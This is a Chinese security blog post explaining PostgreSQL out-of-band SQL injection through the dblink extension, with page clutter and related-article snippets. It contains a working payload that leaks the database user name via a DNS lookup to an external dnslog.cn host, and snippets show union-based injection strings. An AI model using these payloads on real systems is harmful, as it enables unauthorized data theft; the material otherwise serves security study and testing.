SQL注入漏洞(postgresql之OOB带外注入)

已于 2022-07-13 10:49:45 修改
阅读量1.2k 收藏 2
点赞数
分类专栏: SQL注入 文章标签: postgresql 数据库 sql SQL注入 安全
于 2022-07-13 10:47:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51295677/article/details/125758434
版权

这个可以与MYSQLDNSLog原理想相同,也可以就叫他DNSLog带外注入。所用到的函数有两个dblink() / dblink_connect()不过dblink()需要超级用户才能使用。

这几个函数都来源一个插件dblink,也就是说这几个函数都不是PG自带的而需要扩展安装

安装指令:create extension dblink

dblink_connect()

表示打开一个到数据库的持久连接,前面说dblink_connect()只有超级用户才能调用,而实际上有一个与之作用基本相同且不需要超级用户便能调用的一个函数---dblink_connect_u(),但不安全基本不会用。

dblink_connect('conname','connstr')

conname(可选):要用于这个连接的名字。如果被忽略,将打开一个未命名连接并且替换掉任何现有的未命名连接。

connstr(必选):数据库连接串信息,格式为:hostaddr=127.0.0.1 port=5432 dbname=mydb user=postgres password=mypasswd

由于是持久连接,因此需要一个阻断其连接的函数-----dblink_disconnect('conname')

conname参数还是可选的,因为可能出现未命名连接,所以当conname为空时,则阻断未命名的连接。

dblink()

dblinke_connect()持久连接相对,dblink()是短暂的连接,即在一个远程数据库中执行一个查询。

dblink('conname','connstr','sql','fail_on_error')

conname:要使用的连接名。忽略这个参数也是用未命名连接。


connstr:如上面为dblink_connect所描述的一个连接信息字符串。


sql:你希望在远程数据库中执行的 SQL 查询,例如select password from users。


fail_on_error:如果为真(忽略时的默认值),那么在连接的远端抛出的一个错误也会导致本地抛出一 个错误。如果为假,远程错误只在本地被报告为一个 NOTICE,并且该函数不反回行。

因为connstr需要用到host,直接IP还没啥,如果是域名呢?当然是会被解析,解析域名?那不是又回到了DNSLog注入

DNSLog网站中get一个域名,写一条如下的指令

SELECT * FROM dblink('host='||(select user)||'.6niwhz.dnslog.cn user=vulhub password=vulhub dbname=vulhub', 'SELECT version()') RETURNS (result TEXT);

可以看到携带成功 ,这个玩意儿后面有个CVE的未授权洞就要用到这个带外。

参考:PostgreSQL dblink使用详解_foucus、的博客-CSDN博客_dblink postgre

errorr0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入
weixin_45544843的博客
11-12 666
SQL 注入一、常见的数据库二、数据库结构三、Mysql注入基本流程四、盲注MySQL注入——Dns注入Sqlite 注入流程 一、常见的数据库 Oracle :甲骨文公司 SQL Server :微软公司 DB2 :IBM公司 postgreSQL : 开源 MySQL : 开源 Access :微软公司[古董] 二、数据库结构 库:一堆表组成的数据集合 表:由行跟列组成的二维表 字段:表中的列称为字段 记录:表中的行称为记录 单元格:行跟列相交的地称为单元格 SQL注入简介: 一种针对于数据库的攻
SQL注入漏洞postgresql注入
errorr0
07-08 7319
postgresql sql注入
PostgreSQL数据库注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据库))
T1ngSh0w的博客
09-06 1459
PostgreSQL数据库注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据库)
墨者 - SQL手工注入漏洞测试(PostgreSQL数据库)
吃肉唐僧的博客
07-09 1067
用order by测试字段数 字段为4 测试回显位置 /new_list.php?id=1 and 1=2 union select '1','2','3','4' 暴库 /new_list.php?id=1 and 1=2 union select '1',(select current_database()),'3','4' 爆表 ,这里有两种方法...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
PHP与SQL注入攻击[三]
12-17
目前大概只有MySQL,SQLite,PostgreSQL,Sybase带有这样的功能,而包括Oracle和SQL Server在内的很多数据库都没有。 鉴于这样的情况,一般开发者采用一种通用的方法来避免不安全的数据写入数据库–base64编码。这样...
PostgreSQLSQL调优指南.pptx
08-08
PostgreSQLSQL调优指南 PostgreSQLSQL调优指南是一份详细的SQL优化指南,旨在帮助开发者和数据库管理员提高PostgreSQL数据库的性能。该指南涵盖了从获取SQL收集统计信息到分析SQL慢的原因的所有步骤。 首先,...
SQL注入攻击与防御
03-04
SQL注入攻击与防御(第2版)》前一版荣获2009Bejtlich最佳图书奖,第2版对内容做了全面更新,融入了一些最新的研究成果,包括如何在移动设备上利用SQL注入漏洞,以及客户端SQL注入等。《SQL注入攻击与防御(第2版)》...
SQL注入攻击与防御(第2版).part1
06-26
 《安全技术经典译丛:SQL注入攻击与防御(第2版)》前一版荣获2009Bejtlich图书奖,第2版对内容做了全面更新,融入了一些的研究成果,包括如何在移动设备上利用SQL注入漏洞,以及客户端SQL注入等。  《安全技术...
postgresql 带外注入
SopRomeo的博客
01-31 646
最近某秋弄了个比赛,有个题是FBCTF的原题魔改的脑洞题 记录下 postgresql带外注入(FBCTF) FBCTF详解 解题 这题就是脑洞,flag名字在.htaccess文件里,提示也只说flag在web的某个目录下,真鸡巴离谱,这题的数据库用户权限很低,只有查询权限,RCE是很困难的 我用的是外联数据库的方法 vps环境:Ubuntu18.04 apt install 安装即可 百度有 修改配置文件 设置 listen_addresses = ‘*’ 重启服务 手机访问 f12体验苹果6 用上
mysql注入-OOB注入
weixin_44316992的博客
12-07 1030
OOB注入 带外通道技术(Out-Of-Band ) 带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞。 这一类漏洞中,攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。 带外通道技术通常需要脆弱的实体来生成带外的TCP/UDP/ICMP请求,然后,攻击者可以通过这个请求来提取数据。 利用条件: 脆弱的系统 预备知识点 DNS查询 UNC路径——可以用于共享文件夹 UNC( Universal Naming Convention)/通用命名规则 Windows主机默认
OOB注入
yybzzz的博客
05-18 552
目录条件对比预备知识DNSDNS迭代查询原理泛域名解析UNC路径tcpdumpload_file()环境搭建漏洞利用 OUT OF BAND(带外通道技术) 让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞 可以看作一种速度具有优势的盲注,因为实现了变相回显 条件 系统存在漏洞,允许我们构建恶意请求 外围防火墙的出站策略:攻击目标需要向指定的另外一个目标发送特殊请求,因此要求防火墙对特殊请求能够放行 对比 攻击类别 SQL注入类型 说明 INBAND 报错型、联合查询 根据应
PostgreSQL数据库注入
谢公子的博客
03-04 8369
1
关于PostgreSQLSQL注入必知必会
weixin_30737363的博客
02-13 763
一、postgresql简介 postgresql是一款关系型数据库,广泛应用在web编程当中,由于其语法与MySQL不尽相同,所以其SQL注入又自成一派。 二、postgresqlSQL注入:(注意注释符号--+) 1、简单的有回显的SQL注入不用多说,还是基本的SQL语句直接查询就可以了。 1 #简单的payload 2 parameter = 2-1 3 parameter...
SQL注入了解OOB(带外通道)
weixin_43303273的博客
09-18 1280
这是以前做的一个PPT sql注入利用要求
SQL注入总结(一)
guanjian_ci的博客
02-19 487
第一部分:常规注入(数据有回显前端) 第一步:测试数据类型 1.数字型 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 2.字符型 id=1‘ and ’1‘=’1 页面正常 id=1‘ and ’1‘=’2 页面不正常 3.睡眠判断(数据不回显前端时使用) id=1' and sleep(10)--+ 页面缓冲10秒说明判断正确 4.开发常用接受参数的类型 数字型: id=$id 字符型: ...
postgresql 小技巧
朝着梦想 渐行前进
01-25 2184
postgresql 小技巧
kali sql注入
最新发布
09-27
SQLMap是一个自动化的SQL注入工具,它可以扫描、发现并利用给定URL的SQL注入漏洞。它支持多种数据库,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值